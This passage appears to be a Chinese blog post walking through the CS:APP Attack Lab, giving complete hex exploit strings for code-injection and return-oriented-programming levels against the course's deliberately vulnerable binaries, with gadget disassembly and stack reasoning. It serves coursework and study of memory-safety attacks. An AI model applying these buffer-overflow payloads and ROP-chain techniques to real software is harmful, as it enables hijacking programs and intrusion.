class="number">61</span> <span class="number">55</span></span><br></pre></td></tr></table></figure>

<p>​	输出如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$&gt; ./hex2raw &lt; phase2.txt | ./ctarget -q</span><br><span class="line">Cookie: 0x59b997fa</span><br><span class="line">Type string:Touch2!: You called touch2(0x59b997fa)</span><br><span class="line">Valid solution for level 2 with target ctarget</span><br><span class="line">PASS: Would have posted the following:</span><br><span class="line">        user id bovik</span><br><span class="line">        course  15213-f15</span><br><span class="line">        lab     attacklab</span><br><span class="line">        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00</span><br></pre></td></tr></table></figure>

<p>​	这个过程中栈的变化大概如下图</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200735449.png" alt="image-20220327200735449"></p>
<h2 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h2><p>​	这一部分和Level 2其实差不多，但是区别在于这一部分要传递的参数是个字符串，以及这一部分要执行的函数<code>touch3</code>还会调用一个<code>hexmatch</code>函数，这又会导致一些别的变化，先看一下这两个函数的代码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">int hexmatch(unsigned val, char *sval)&#123;</span><br><span class="line">    char cbuf[110];</span><br><span class="line">    char *s = cbuf + random() % 100;</span><br><span class="line">    sprintf(s, &quot;%.8x&quot;, val);</span><br><span class="line">    return strncmp(sval, s, 9) == 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void touch3(char *sval)&#123;</span><br><span class="line">    vlevel = 3;</span><br><span class="line">    if (hexmatch(cookie, sval))&#123;</span><br><span class="line">        printf(&quot;Touch3!: You called touch3(\&quot;%s\&quot;)\n&quot;, sval);</span><br><span class="line">        validate(3);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        printf(&quot;Misfire: You called touch3(\&quot;%s\&quot;)\n&quot;, sval);</span><br><span class="line">        fail(3);</span><br><span class="line">    &#125;</span><br><span class="line">    exit(0);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	我们可以先考虑一下这个和Level 2有什么不同，首先就要注入的代码而言，因为这里的参数是个地址，所以我们暂时还不知道参数在哪，剩下的基本都是一样的，如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov ?, %rdi # ?是一个地址，是字符串的位置</span><br><span class="line">pushq $0x4018fa # 0x4018fa是touch3的开始地址</span><br><span class="line">retq</span><br></pre></td></tr></table></figure>

<p>​	所以接下来我们需要考虑一下要把这个字符串存到哪个地址。事实上，我们注意到了在<code>hexmatch</code>函数中有一个随机数，所以如果把字符串放到<code>touch3</code>的栈帧里，是肯定很容易被覆盖掉的，所以我们考虑将其放到<code>test</code>函数的栈帧上，一样的查看<code>test</code>函数的栈底地址，发现是<code>0x5561dca8</code>，其实准确来说应该是<code>0x5561dca0</code>，但是我们这个位置已经被覆盖了，所以我们需要再往上走。</p>
<p>​	所以最终的答案应该是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 a8 dc 61 55 68</span><br><span class="line">fa 18 40 00 c3 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">78 dc 61 55 00 00 00 00 </span><br><span class="line">35 39 62 39 39 37 66 61 </span><br></pre></td></tr></table></figure>

<p>​	这个过程中的栈如图所示。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200753701.png" alt="image-20220327200753701"></p>
<h1 id="Part-2"><a href="#Part-2" class="headerlink" title="Part 2"></a>Part 2</h1><p>​	在这一部分，由于代码加入了随机生成栈以及访问权限，原本的代码注入攻击就用不了了，但是我们可以用一些别的方法，具体来说就是这里所用到的ROP，也就是通过程序中已有的一些指令组合出自己想要的指令。</p>
<h2 id="Level-2-1"><a href="#Level-2-1" class="headerlink" title="Level 2"></a>Level 2</h2><p>​	这里我们要做的和Part 1的Level 2一样，也就是说，所需要的操作还是把<code>cookie</code>赋给寄存器<code>%rdi</code>，然后把<code>touch2</code>函数压到栈里。所以我们的想法大致是这样的：利用缓冲区溢出，把原本的返回地址覆盖成一条<code>pop</code>，然后随后是<code>cookie</code>，再往后是<code>mov</code>指令，再往后是<code>touch</code>的地址，那么我们就得考虑一下这里要用哪一部分的指令了，先看一下这几个函数的反汇编。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">000000000040199a &lt;getval_142&gt;:</span><br><span class="line">  40199a:       b8 fb 78 90 90          mov    $0x909078fb,%eax</span><br><span class="line">  40199f:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019a0 &lt;addval_273&gt;:</span><br><span class="line">  4019a0:       8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax</span><br><span class="line">  4019a6:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019a7 &lt;addval_219&gt;:</span><br><span class="line">  4019a7:       8d 87 51 73 58 90       lea    -0x6fa78caf(%rdi),%eax</span><br><span class="line">  4019ad:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019ae &lt;setval_237&gt;:</span><br><span class="line">  4019ae:       c7 07 48 89 c7 c7       movl   $0xc7c78948,(%rdi)</span><br><span class="line">  4019b4:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019b5 &lt;setval_424&gt;:</span><br><span class="line">  4019b5:       c7 07 54 c2 58 92       movl   $0x9258c254,(%rdi)</span><br><span class="line">  4019bb:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019bc &lt;setval_470&gt;:</span><br><span class="line">  4019bc:       c7 07 63 48 8d c7       movl   $0xc78d4863,(%rdi)</span><br><span class="line">  4019c2:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019c3 &lt;setval_426&gt;:</span><br><span class="line">  4019c3:       c7 07 48 89 c7 90       movl   $0x90c78948,(%rdi)</span><br><span class="line">  4019c9:       c3                      retq</span><br><span class="line"></span><br><span class="line">00000000004019ca &lt;getval_280&gt;:</span><br><span class="line">  4019ca:       b8 29 58 90 c3          mov    $0xc3905829,%eax</span><br><span class="line">  4019cf:       c3                      retq</span><br></pre></td></tr></table></figure>

<p>​	然后再看一下官方文档里面给出的编码</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327220701062.png" alt="image-20220327220701062"></p>
<p>​	然后我们需要寄存器<code>%rdi</code>，参考上图可知需要<code>48 89 ??</code>这种格式的，然后结合后面的<code>pop</code>指令，可知另外一个寄存器选择<code>%rax</code>是最合适的，最终我们可以选择<code>addval_273</code>和<code>addval_219</code>，相应的地址就是<code>0x4019a2</code>和<code>0x4019ab</code></p>
<p>​	因此，这一题最终的答案如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">ab 19 40 00 00 00 00 00</span><br><span class="line">fa 97 b9 59 00 00 00 00</span><br><span class="line">a2 19 40 00 00 00 00 00</span><br><span class="line">ec 17 40 00 00 00 00 00</span><br></pre></td></tr></table></figure>

<p>​	栈帧变化如图所示</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220330092727890.png" alt="image-20220330092727890"></p>
<h2 id="Level-3-1"><a href="#Level-3-1" class="headerlink" title="Level 3"></a>Level 3</h2><p>​	这里要做的和上面Part1部分的Level 3一致，但是难度会更大，我们先放出相关函数的代码</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch3</span><span class="params">(<span class="keyword">char</span> *sval)</span></span>&#123;</span><br><span class="line">    vlevel = <span class="number">3</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">hexmatch</span>(cookie, sval))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Touch3!: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line">        <span class="built_in">validate</span>(<span class="number">3</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line">        <span class="built_in">fail</span>(<span class="number">3</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">hexmatch</span><span class="params">(<span class="keyword">unsigned</span> val, <span class="keyword">char</span> *sval)</span></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line">    <span class="keyword">char</span> *s = cbuf + <span class="built_in">random</span>() % <span class="number">100</span>;</span><br><span class="line">    <span class="built_in">sprintf</span>(s, <span class="string">&quot;%.8x&quot;</span>, val);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	回忆一下，在上面那个Level 3，由于担心我们的字符串被新的函数栈帧覆盖，所以我们将字符串放到了<code>test</code>函数的栈帧里。但是在这里我们不能这样做，因为这里开启了栈随机化，我们不能再简单地用绝对地址进行读取，而是要选取一个地址作为基准，在上面增加一个偏移量<code>bias</code></p>
<p>​	这里看一下材料中给出的相关的机器指令</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220330084217412.png" alt="image-20220330084217412"></p>
<p>​	当然在上面的Level 2也给出了一些指令。现在我们需要找的就是一个可以用来计算的指令，比如<code>lea</code>或者<code>add</code>，看一下反汇编，在<code>0x4019d6</code>位置发现了这样一条指令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">4019d6:       48 8d 04 37             lea   (%rdi,%rsi,1),%rax</span><br></pre></td></tr></table></figure>

<p>​	这里其实就可以作为地址计算了，即<code>%rax=%rdi+%rsi</code>，那我们现在就需要找点办法，可以让寄存器<code>%rdi</code>和<code>%rsi</code>中存放我们想要的值。</p>
<p>​	假定，我们考虑把<code>%rsp</code>放到<code>%rdi</code>里，把偏移地址放到<code>%rsi</code>里，根据之前的讨论，为了防止字符串被覆盖，我们还是需要把它放到<code>test</code>函数的栈帧里，那我们就继续在反汇编里查找我们需要的指令。</p>
<p>​	经过查找最终的答案应该如下所示。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00</span><br><span class="line">06 1a 40 00 00 00 00 00 # movq %rsp,%rax</span><br><span class="line">a2 19 40 00 00 00 00 00 # movq %rax,%rdi</span><br><span class="line">cc 19 40 00 00 00 00 00 # pop %rax</span><br><span class="line">48 00 00 00 00 00 00 00 # 将0x48写入栈帧，就是bias，通过指令数目计算得到的</span><br><span class="line">dd 19 40 00 00 00 00 00 # movl %eax,%edx </span><br><span class="line">70 1a 40 00 00 00 00 00 # movl %edx,%ecx</span><br><span class="line">13 1a 40 00 00 00 00 00 # movl %ecx,%esi</span><br><span class="line">d6 19 40 00 00 00 00 00 # lea (%rdi,%rsi,1),%rax</span><br><span class="line">a2 19 40 00 00 00 00 00 # movq %rax,%rdi</span><br><span class="line">fa 18 40 00 00 00 00 00 # touch3</span><br><span class="line">35 39 62 39 39 37 66 61 00 # cookie</span><br></pre></td></tr></table></figure>

<p>​	这整个查找的过程也蛮复杂的，主要是因为最开始想着直接查<code>movq</code>这种指令，发现一直没有，后来就用<code>movl</code>去查，还要用寄存器来回做几次中转，最终的栈帧大概和下面一样</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220330093106410.png" alt="image-20220330093106410"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>Buy me a coffee</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="ysjhust 微信">
        <span>微信</span>
      </div>
      <div>
        <img src="/images/alipay.png" alt="ysjhust 支付宝">
        <span>支付宝</span>
      </div>

  </div>
</div>

          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>ysjhust
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://ysjyx7.github.io/2022/03/27/Attacklab/" title="Attacklab">https://ysjyx7.github.io/2022/03/27/Attacklab/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="followme">
  <span>欢迎关注我的其它发布渠道</span>

  <div class="social-list">

      <div class="social-item">
        <a target="_blank" class="social-link" href="https://www.zhihu.com/people/yang-lao-er-25-83">
          <span class="icon">
            <i class="fab fa-zhihu"></i>
          </span>

          <span class="label">知乎</span>
        </a>
      </div>

      <div class="social-item">
        <a target="_blank" class="social-link" href="https://blog.csdn.net/m0_55101026?spm=1001.2101.3001.5343">
          <span class="icon">
            <i class="fa fa-book"></i>
          </span>

          <span class="label">CSDN</span>
        </a>
      </div>

      <div class="social-item">
        <a target="_blank" class="social-link" href="https://github.com/ysjyx7">
          <span class="icon">
            <i class="fab fa-github"></i>
          </span>

          <span class="label">GitHub</span>
        </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/csapp/" rel="tag"># csapp</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/03/26/hadoop%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4%E8%AE%B0%E5%BD%95/" rel="prev" title="hadoop常用命令记录">
                  <i class="fa fa-chevron-left"></i> hadoop常用命令记录
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/04/02/%E5%AF%B9%E6%8B%8D%E5%99%A8/" rel="next" title="对拍器">
                  对拍器 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2021 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ysjhust</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">271k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">4:07</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
-->

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  
<script src="/js/third-party/search/local-search.js"></script>




  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js","integrity":"sha256-r+3itOMtGGjap0x+10hu6jW/gZCzxHsoKrOd7gyRSGY="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
